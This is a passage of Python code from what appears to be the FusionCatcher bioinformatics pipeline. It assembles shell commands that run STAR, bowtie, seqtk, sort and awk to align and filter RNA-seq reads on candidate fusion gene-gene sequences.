job.add('LC_ALL=C',kind='parameter') # job.add('cut',kind='parameter') # job.add('-f','1',kind='parameter') # job.add('>',part+'.len',kind='output') # job.run() # get the length of the FASTA file job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-v','"^>"',kind='parameter') job.add('',part,kind='input') job.add('|',kind='parameter') job.add('wc',kind='parameter') job.add('|',kind='parameter') job.add('awk',kind='parameter') job.add("'{print $3-$1}'",kind='parameter') job.add('>',part+'.len',kind='output') job.run() #grep -v ">" file.fasta | wc | awk '{print $3-$1}' genomesaindexnbases = int(min(14, math.log(100,2)/(float(2)) - 1)) if os.path.exists(part+'.len'): ti = file(part+'.len','r').readline().strip() lenparts = len(parts) genomesaindexnbases = int(min(14, math.log(float(ti),2)/(float(2)) - 1)) #genomechrbinnbits = int(min(18, math.log(float(t)/(math.ceil(float(sequences_gg)/float(lenparts)))+2,2))) job.clean(part+'.len',temp_path=temp_flag) # build the STAR index gd = "%s_star/" % (part,) gdr = "%s_star-results/" % (part,) job.add(_SR_+'STAR',kind='program') job.add('--genomeChrBinNbits',genomechrbinnbits,kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases,kind='parameter') job.add('--runMode','genomeGenerate',kind='parameter') if star25: job.add('--genomeSuffixLengthMax','10000',kind='parameter') # for STAR 2.5.x job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--genomeDir',gd,kind='output') job.add('--genomeFastaFiles',part,kind='input') job.add('--outFileNamePrefix',gd,kind='output') job.run() # t = "[from file: '%s']" % (maxlens[i],) # #if job.run(): # if os.path.exists(maxlens[i]): # t = file(maxlens[i],'r').readline().strip() # align the unmapped reads using STAR on candidate fusion gene-gene job.add(_SR_+'STAR',kind='program') job.add('--runRNGseed','54321',kind='parameter') #job.add('--twopass1readsN',outdir('log_counts_reads_gene-gene_no-str.txt'),kind='parameter',from_file='yes') job.add('--twopass1readsN','-1',kind='parameter') job.add('--twopassMode','Basic',kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases,kind='parameter') job.add('--sjdbOverhang',outdir('star_sdjboverhang.txt'),kind='parameter',from_file='yes') #job.add('--alignIntronMax',outdir('gene-gene_longest.txt'),kind='parameter',from_file = 'yes') job.add('--alignIntronMax',maxlens[i],kind='parameter',from_file = 'yes') if options.skip_star_bowtie: job.add('--outFilterMatchNmin',int(float(min_len_reads)*0.90),kind='parameter') job.add('--outFilterMatchNminOverLread','0.90',kind='parameter') job.add('--outFilterScoreMinOverLread','0.90',kind='parameter') # NEW in v0.99.4b job.add('--alignSplicedMateMapLminOverLmate','0.90',kind='parameter') # NEW in v0.99.4b else: perc = 0.40 # 0.49 if eporcrlf2igh: perc = float("%.4f" % ((float(length_anchor_minimum - 1) / float(min_len_reads)),)) job.add('--outFilterMatchNmin',int(float(min_len_reads)*perc),kind='parameter') job.add('--outFilterMatchNminOverLread',perc,kind='parameter') job.add('--outFilterScoreMinOverLread',perc,kind='parameter') # NEW in v0.99.4b job.add('--alignSplicedMateMapLminOverLmate',perc,kind='parameter') # NEW in v0.99.4b job.add('--genomeDir',gd,kind='input',temp_path=temp_flag) job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--seedSearchStartLmax',length_anchor_star-1,kind='parameter') # 20 # default is: 50 job.add('--alignSJoverhangMin',length_anchor_star-1,kind='parameter') # 9 # default is 5? # NEW in v0.99.4b if star25: job.add('--alignSJstitchMismatchNmax','5 -1 5 5',kind='parameter')# default is: 0 -1 0 0 # added in STAR 2.5.x job.add('--outSJfilterOverhangMin','10 10 10 10',kind='parameter')# default is: 30 12 12 12 ("non-canonical motifs","GT/AG"motif,"GC/AG"motif,"AT/AC"motif) job.add('--outSJfilterCountUniqueMin','1 1 1 1',kind='parameter')# default is: 3 1 1 1 job.add('--outSJfilterCountTotalMin','1 1 1 1',kind='parameter')# default is: 3 1 1 1 job.add('--outSJfilterDistToOtherSJmin','0 0 0 0',kind='parameter')# default is: 10 0 5 10 job.add('--outSJfilterIntronMaxVsReadN',maxlens[i],kind='parameter',from_file='yes')# default is: 50000 100000 200000 job.add('',maxlens[i],kind='parameter',from_file='yes')# default is: 50000 100000 200000 job.add('',maxlens[i],kind='parameter',from_file='yes')# default is: 50000 100000 200000 #job.add('--outSJfilterIntronMaxVsReadN','%s %s %s' % (t,t,t),kind='parameter')# default is: 50000 100000 200000 job.add('--limitOutSAMoneReadBytes','100000000',kind='parameter') job.add('--scoreGapNoncan','-4',kind='parameter') # should it be -2? job.add('--scoreGapATAC','-4',kind='parameter') if is_optparse_provided(parser,'limitSjdbInsertNsj'): job.add('--limitSjdbInsertNsj',options.limitSjdbInsertNsj,kind='parameter') if is_optparse_provided(parser,'limitOutSJcollapsed'): job.add('--limitOutSJcollapsed',options.limitOutSJcollapsed,kind='parameter') job.add('--readFilesIn',outdir('reads_gene-gene_no-str_fixed.fq'),kind='input') job.add('--outFileNamePrefix',gdr,kind='output') job.add('--outFileNamePrefix',os.path.join(gdr,'Aligned.out.sam'),kind='output',command_line = 'no') job.run() job.add('LC_ALL=C',kind='program') job.add('sed',kind='parameter') job.add("""'s/\-\([1-2]\\t\)/\/\\1/'""",os.path.join(gdr,'Aligned.out.sam'),kind='input') job.add("",gdr,kind='input',temp_path=temp_flag,command_line='no') job.add('|',kind='parameter') job.add('sam2psl.py',kind='parameter') job.add('--input','-',kind='parameter') job.add('--output','-',kind='output') #job.add('--output',outdir('gene-gene-star.psl.')+str(i),kind='output',dest_list='genegenestar') #job.run() job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('gene-gene-star.psl.')+str(i),kind='output') job.run() if options.skip_star_bowtie: job.clean(part,temp_path=temp_flag) job.link(outdir('gene-gene-star.psl.')+str(i), outdir('gene-gene-star_more.psl.')+str(i), temp_path=temp_flag, dest_list='genegenestar') else: job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('gene-gene-star.psl.')+str(i),kind='input') job.add('--output',outdir('gene-gene-star_final.psl.')+str(i),kind='output',temp_path=temp_flag) job.add('--clipped-reads-ids',outdir('reads-ids_clip_psl_star.txt.')+str(i),kind='output') job.add('--clipped-reads-refs',outdir('reads-refs_clip_psl_star.txt.')+str(i),kind='output') job.add('--clip-min',length_anchor_star,kind='parameter') job.run() if job.iff(empty(outdir('reads-ids_clip_psl_star.txt.')+str(i)),id = "#reads-ids-clip-psl-star."+str(i)+"#"): job.clean(outdir('reads-ids_clip_psl_star.txt.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-refs_clip_psl_star.txt.')+str(i),temp_path=temp_flag) job.clean(part,temp_path=temp_flag) else: job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-ids_clip_psl_star.txt.')+str(i),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-ids_clip_star_psl_uniq.txt.')+str(i),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f1',outdir('reads-ids_clip_star_psl_uniq.txt.')+str(i),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('subseq',kind='parameter') job.add('',outdir('reads_gene-gene_no-str.fq'),kind='input') job.add('-',kind='parameter') job.add('>',outdir('reads-ids_clip_star_psl.fq.')+str(i),kind='output') job.run() job.add(_FC_+'split-reads.py',kind='program') job.add('--input',outdir('reads-ids_clip_star_psl.fq.')+str(i),kind='input') job.add('--list',outdir('reads-ids_clip_star_psl_uniq.txt.')+str(i),kind='input') job.add('--wiggle-size',options.rescue_wiggle_size,kind='parameter') job.add('--gap-size',options.rescue_gap_size,kind='parameter') job.add('--anchor-size',length_anchor_minimum,kind='parameter') job.add('--output-1',outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),kind='output') job.add('--output-2',outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),kind='output') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails due to a memory error then lowering the "+ "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ "of FusionCatcher and running it again might help!")) job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-refs_clip_psl_star.txt.')+str(i),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-refs_clip_star_psl_uniq.txt.')+str(i),kind='output') job.run() # some pre-filtering of splitting reads (filter out the split reads which map on one gene) job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads-refs_clip_star_psl_uniq.txt.')+str(i),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"|"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f',"1,2",kind='parameter') job.add('|',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('|',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') # unique job.add('|',kind='parameter') job.add('sed',kind='parameter') job.add("'1{/^$/d}'",kind='parameter') # delete first line if it empty (that contains only newline) job.add('>',outdir('reads-refs_clip_star_psl_uniq_more.txt.')+str(i),kind='output') job.run() gdau = "%s_bowtie_star_unique.fa" % (part,) job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('gene-gene_unique.fa'),kind='input') job.add('',outdir('reads-refs_clip_star_psl_uniq_more.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('>',gdau,kind='output') job.run() gdbu = "%s_bowtie_star_unique/" % (part,) job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') #job.add('',outdir('gene-gene.fa'),kind='input') job.add('',gdau,kind='input',temp_path=temp_flag) job.add('',gdbu,kind='output',checksum='no') job.add('',gdbu,kind='output',command_line='no') job.run() # map using bowtie # filter out reads not mapping ms = min(options.mismatches,2) if options.skip_fastqtk: job.add(_SK_+'seqtk',kind='program') job.add('mergepe',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),kind='input') job.add('',outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),kind='input') else: job.add(_FK_+'fastqtk',kind='program') job.add('interleave',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),kind='input') job.add('',outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'sliding-read.py',kind='parameter') job.add('--window','33',kind='parameter') job.add('--step','15',kind='parameter') job.add('-i','-',kind='parameter') job.add('-o','-',kind='parameter') job.add('|',kind='parameter') job.add(_BE_+'bowtie',kind='parameter') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') # job.add('--trim5','10',kind='parameter') # job.add('--trim3','10',kind='parameter') job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') if os.path.isfile(os.path.join(gdbu,'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',gdbu,kind='input') job.add('-',kind='parameter') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star-temp.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') if eporcrlf2igh == False: job.add('awk',kind='parameter') job.add('',"""'{n=length($0); if (olde=="a" && substr($0,0,n-1)==old && substr($0,n,1)=="b") {print old"a\\n"$0; old="";} {old=substr($0,0,n-1); olde=substr($0,n,1);}}'""",kind='parameter') else: job.add('awk',kind='parameter') job.add("""'{n=length($0); r=substr($0,1,n-1); print r"a"; print r"b"}'""",kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_filtered_unique_cuts_star.txt.')+str(i),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),kind='input') job.add('',outdir('reads_filtered_unique_cuts_star.txt.')+str(i),kind='input') job.add('>',outdir('reads-ids_clip_star_psl_r1r1.fq.')+str(i),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),kind='input') job.add('',outdir('reads_filtered_unique_cuts_star.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_star_psl_r2r2.fq.')+str(i),kind='output') job.run() # this is for the case when the out from the previous command is empty (then it takes the first read) if job.iff(empty(outdir('reads-ids_clip_star_psl_r1r1.fq.')+str(i)),id = "##reads-ids_clip_star_psl_r1r1.fq."+str(i)+"##"): job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),kind='input') job.add('>',outdir('reads-ids_clip_star_psl_r1r1-t.fq.')+str(i),kind='output') job.run() job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),kind='input') job.add('>',outdir('reads-ids_clip_star_psl_r2r2-t.fq.')+str(i),kind='output') job.run() job.clean(outdir('reads-ids_clip_star_psl_r1r1.fq.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_r2r2.fq.')+str(i),temp_path=temp_flag) else: job.link(outdir('reads-ids_clip_star_psl_r1r1.fq.')+str(i), outdir('reads-ids_clip_star_psl_r1r1-t.fq.')+str(i), temp_path=temp_flag) job.link(outdir('reads-ids_clip_star_psl_r2r2.fq.')+str(i), outdir('reads-ids_clip_star_psl_r2r2-t.fq.')+str(i), temp_path=temp_flag) # map using bowtie ms = min(options.mismatches,2) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-X',maxlens[i],kind='parameter',from_file="yes") job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--ff',kind='parameter') job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('reads-ids_clip_star_psl_max_filtered.fq.')+str(i),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(os.path.join(gdbu,'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',gdbu,kind='input',temp_path=temp_flag) job.add('-1',outdir('reads-ids_clip_star_psl_r1r1-t.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_star_psl_r2r2-t.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('',outdir('split_gene-gene_star_filtered.sam.')+str(i),kind='output',temp_path=temp_flag) job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() # this is for the case when the out from the previous command is empty (then it takes the first read) if job.iff(empty(outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1.fq')),id = "##reads-ids_clip_star_psl_unmapped_filtered-"+str(i)+"_1.fq##"): job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1_t.fq'),kind='output') job.run() job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_2_t.fq'),kind='output') job.run() job.clean(outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_2.fq'),temp_path=temp_flag) else: job.link(outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1.fq'), outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1_t.fq'), temp_path=temp_flag) job.link(outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_2.fq'), outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_2_t.fq'), temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),temp_path=temp_flag) gda = "%s_bowtie_star.fa" % (part,) job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',part,kind='input',temp_path=temp_flag) job.add('',outdir('reads-refs_clip_star_psl_uniq.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('>',gda,kind='output') job.run() gdb = "%s_bowtie_star/" % (part,) job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') #job.add('',part,kind='input',temp_path=temp_flag) job.add('',gda,kind='input',temp_path=temp_flag if options.skip_ig_star and eporcrlf2igh == False else 'no') job.add('',gdb,kind='output',checksum='no') job.add('',gdb,kind='output',command_line='no') job.run() # map using bowtie job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') if bowtie121: job.add('--no-unal',kind='parameter') job.add('-k','500',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(gdb,'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if options.ff_tryhard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--sam',kind='parameter') job.add('--ff',kind='parameter') job.add('--un',outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('reads-ids_clip_star_psl_max.fq.')+str(i),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' #job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes") job.add('-X',maxlens[i],kind='parameter',from_file="yes") job.add('',gdb,kind='input') job.add('-1',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1_t.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_2_t.fq'),kind='input',temp_path=temp_flag) if bowtie121: job.add('',outdir('split_gene-gene_star.sam.')+str(i),kind='output') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) else: job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter') job.add('>',outdir('split_gene-gene_star.sam.')+str(i),kind='output') job.run() job.add(_FC_+'merge-sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star.sam.')+str(i),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_patch.sam.')+str(i),kind='output') job.run() job.add(_FC_+'sam2psl.py',kind='program') job.add('--input',outdir('split_gene-gene_star_patch.sam.')+str(i),kind='input',temp_path=temp_flag) #job.add('--output',outdir('split_gene-gene_star_patch.psl.')+str(i),kind='output') job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('split_gene-gene_star_patch.psl.')+str(i),kind='output') job.run() job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star_patch.psl.')+str(i),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_final.psl.')+str(i),kind='output') job.add('--remove-extra',kind='parameter') job.run() if job.iff(empty(outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_1.fq')) or eporcrlf2igh == False,id = "#reads-ids_clip_star_psl_unmapped-"+str(i)+"_1#"): job.clean(outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_2.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl.fq.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_uniq.txt.')+str(i),temp_path=temp_flag) job.clean(gdb,temp_path=temp_flag) job.clean(gda,temp_path=temp_flag) else: ########################################################## # unmapped reads are mapped again by allowing a gap is allowed in their alignment ########################################################## # extract reads ids job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("""'NR%4==1 {print substr($0,2,index($0,"__")-2)}'""",outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_1.fq'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('subseq',kind='parameter') #job.add('',outdir('reads-ids_clip_star_psl.fq.')+str(i),kind='input',temp_path=temp_flag) if options.trim_psl_3end_keep < max_len_reads and (not options.skip_extension): job.add('',outdir('original_important.fq.gz'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'trim_poly_tails.py',kind='parameter') job.add('--input','-',kind='parameter') job.add('--repeats',length_anchor_minimum - 1,kind='parameter') # 12 job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'clip_quality.py',kind='parameter') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('-t',options.trim_quality,kind='parameter') # below Q5 trimming starts job.add('--score-type','sanger',kind='parameter') job.add('--input','-',kind='parameter') job.add('--output',outdir('reads-ids_clip_star_psl_unmapped_x.fq.')+str(i),kind='output') else: job.add('',outdir('reads-ids_clip_star_psl.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('-',kind='parameter') job.add('>',outdir('reads-ids_clip_star_psl_unmapped_x.fq.')+str(i),kind='output') job.run() job.clean(outdir('reads-ids_clip_star_psl.fq.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_2.fq'),temp_path=temp_flag) job.add(_FC_+'split-reads.py',kind='program') job.add('--input',outdir('reads-ids_clip_star_psl_unmapped_x.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('--list',outdir('reads-ids_clip_star_psl_uniq.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('--output-1',outdir('reads-ids_clip_star_psl_unmapped_s_1.fq.')+str(i),kind='output') job.add('--output-2',outdir('reads-ids_clip_star_psl_unmapped_s_2.fq.')+str(i),kind='output') job.add('--wiggle-size',options.gap_wiggle_size,kind='parameter') job.add('--gap-size',options.length_gap,kind='parameter') job.add('--anchor-size',options.length_anchor_gap,kind='parameter') job.add('--anchor-size-max',options.length_anchor_gap_max,kind='parameter') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') if not options.skip_ig_star: job.add('--output-2-rc',kind='parameter') job.add('--replace-solexa-ids','=',kind='parameter') job.run(error_message = ("If this fails due to a memory error then lowering the "+ "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ "of FusionCatcher and running it again might help!")) if options.skip_ig_star: job.clean(gda,temp_path=temp_flag) # map using bowtie job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') if bowtie121: job.add('--no-unal',kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') #job.add('-v',options.mismatches,kind='parameter') job.add('-v',options.mismatches+1,kind='parameter') # 2 here is not enough for IGH!!!! job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(gdb,'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') #job.add('--tryhard',kind='parameter') #????? job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--sam',kind='parameter') 